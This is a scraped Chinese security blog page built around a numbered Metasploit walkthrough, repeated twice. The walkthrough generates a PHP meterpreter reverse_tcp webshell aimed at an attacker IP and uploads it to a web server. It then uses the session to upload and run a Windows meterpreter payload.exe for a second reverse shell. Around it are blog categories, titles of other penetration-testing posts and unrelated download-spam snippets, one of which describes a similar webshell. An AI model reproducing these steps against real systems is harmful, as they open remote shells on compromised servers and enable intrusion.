- 浏览: 291527 次
-
文章分类
- 全部博客 (276)
- burp+hydra暴力破解 (1)
- kali linux工具集 (6)
- kali (59)
- linux (54)
- password (14)
- web (63)
- 渗透测试 (50)
- windows (40)
- metasploit (9)
- 信息收集 (32)
- burp suit (4)
- 安全审计 (9)
- https://github.com/secretsquirrel/the-backdoor-factory (0)
- nmap (4)
- arachni (2)
- 工具 (5)
- sql (3)
- 网络 (2)
- 后渗透测试 (10)
- 内网 (5)
- 无线 (2)
- C (3)
- bios (1)
- RoR (12)
- mongodb (1)
- linxu (1)
- gdb (1)
- linux,虚拟化 (1)
- python (4)
最新评论
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set LHOST Attacker's_IP
6. set LPORT 443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set LHOST Attacker's_IP
6. set LPORT 443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
发表评论
-
linux 安装scrapy
2015-09-07 13:06 607由于scrapy对python3支持不是很好,所以使用pyth ... -
nginx reverse proxy cofinguration
2015-08-28 15:18 433based on our case, we need to h ... -
wpscan
2015-08-01 10:39 447https://www.digitalocean.com/co ... -
[转]Tunneling Data and Commands Over DNS to Bypass Firewalls
2015-07-13 20:44 489https://zeltser.com/c2-dns-tunn ... -
arachni-web-ui使用
2015-06-10 01:04 2150最近在玩儿arachni,想试试arachni-ui-web, ... -
HACKING NODEJS AND MONGODB
2015-06-04 23:52 347http://blog.websecurify.com/201 ... -
php object inject
2015-05-29 00:45 343解释: http://securitycafe.ro/2015 ... -
[转]Forcing XXE Reflection through Server Error Messages
2015-05-19 01:10 466原文地址:https://blog.netspi.com/fo ... -
CVE-2011-2461
2015-03-31 01:19 440http://blog.nibblesec.org/2015/ ... -
[转]Deep Dive Into Stageless Meterpreter Payloads
2015-03-31 01:13 577https://community.rapid7.com/co ... -
[译]从配置错误的web server中dump git数据
2015-03-26 01:07 602原文地址:https://blog.netspi.com/du ... -
[译]解密MSSQL密码
2015-03-26 00:43 2887原文地址: https://blog.ne ... -
[转]badsamba
2015-03-20 00:55 331原文地址:http://blog.gdssecurity.co ... -
自动化Man-in-the-Middle SSHv2攻击
2015-03-18 01:26 1049参考:http://www.david-guembel.de/ ... -
[转]Microsoft Access sqli
2015-03-18 00:57 449https://milo2012.wordpress.com/ ... -
[转]sqlmap注入Microsoft Access
2015-03-18 00:49 1600https://github.com/sqlmapprojec ... -
crossdomain.xml
2015-03-12 01:23 686参考: https://hackerone.com/repor ... -
[译]使用wireshark解密TLS浏览器流量
2015-03-12 00:57 4149原文地址:https://jimshaver.net/2015 ... -
xxe方法
2015-02-01 18:32 854原文地址:http://www.christian-schne ... -
owasp zed--Web Sockets
2015-01-31 01:16 650http://digi.ninja/blog/zap_web_ ...
相关推荐
- **Windows提权工具**:如Meterpreter,Psexec,Nessus等,它们可以利用Windows系统的漏洞来提升权限。 - **Linux提权工具**:如LinEnum,John the Ripper,Privilege Escalation Scanner等,这些工具针对Linux...
在这里,它被用来创建一个PHP Meterpreter反向TCP shell,`lhost`是攻击者的IP(192.168.31.101),`lport`是攻击者机器上监听的端口(4444)。 8. **编辑与上传webshell**: 使用文本编辑器(如Gedit)编辑生成的...
python学习资源
jfinal-undertow 用于开发、部署由 jfinal 开发的 web 项目
基于Andorid的音乐播放器项目设计(国外开源)实现源码,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
python学习资源
python学习资源
python学习一些项目和资源
【毕业设计】java-springboot+vue家具销售平台实现源码(完整前后端+mysql+说明文档+LunW).zip
HTML+CSS+JavaScarip开发的前端网页源代码
python学习资源
【毕业设计】java-springboot-vue健身房信息管理系统源码(完整前后端+mysql+说明文档+LunW).zip
成绩管理系统C/Go。大学生期末小作业,指针实现,C语言版本(ANSI C)和Go语言版本
1_基于大数据的智能菜品个性化推荐与点餐系统的设计与实现.docx
【毕业设计】java-springboot-vue交流互动平台实现源码(完整前后端+mysql+说明文档+LunW).zip
内容概要:本文主要探讨了在高并发情况下如何设计并优化火车票秒杀系统,确保系统的高性能与稳定性。通过对比分析三种库存管理模式(下单减库存、支付减库存、预扣库存),强调了预扣库存结合本地缓存及远程Redis统一库存的优势,同时介绍了如何利用Nginx的加权轮询策略、MQ消息队列异步处理等方式降低系统压力,保障交易完整性和数据一致性,防止超卖现象。 适用人群:具有一定互联网应用开发经验的研发人员和技术管理人员。 使用场景及目标:适用于电商、票务等行业需要处理大量瞬时并发请求的业务场景。其目标在于通过合理的架构规划,实现在高峰期保持平台的稳定运行,保证用户体验的同时最大化销售额。 其他说明:文中提及的技术细节如Epoll I/O多路复用模型以及分布式系统中的容错措施等内容,对于深入理解大规模并发系统的构建有着重要指导意义。
基于 OpenCV 和 PyTorch 的深度车牌识别
【毕业设计-java】springboot-vue教学资料管理系统实现源码(完整前后端+mysql+说明文档+LunW).zip
此数据集包含有关出租车行程的详细信息,包括乘客人数、行程距离、付款类型、车费金额和行程时长。它可用于各种数据分析和机器学习应用程序,例如票价预测和乘车模式分析。
把代码放到Word中,通过开发工具——Visual Basic——插入模块,粘贴在里在,把在硅基流动中申请的API放到VBA代码中。在Word中,选择一个问题,运行这个DeepSeekV3的宏就可以实现在线问答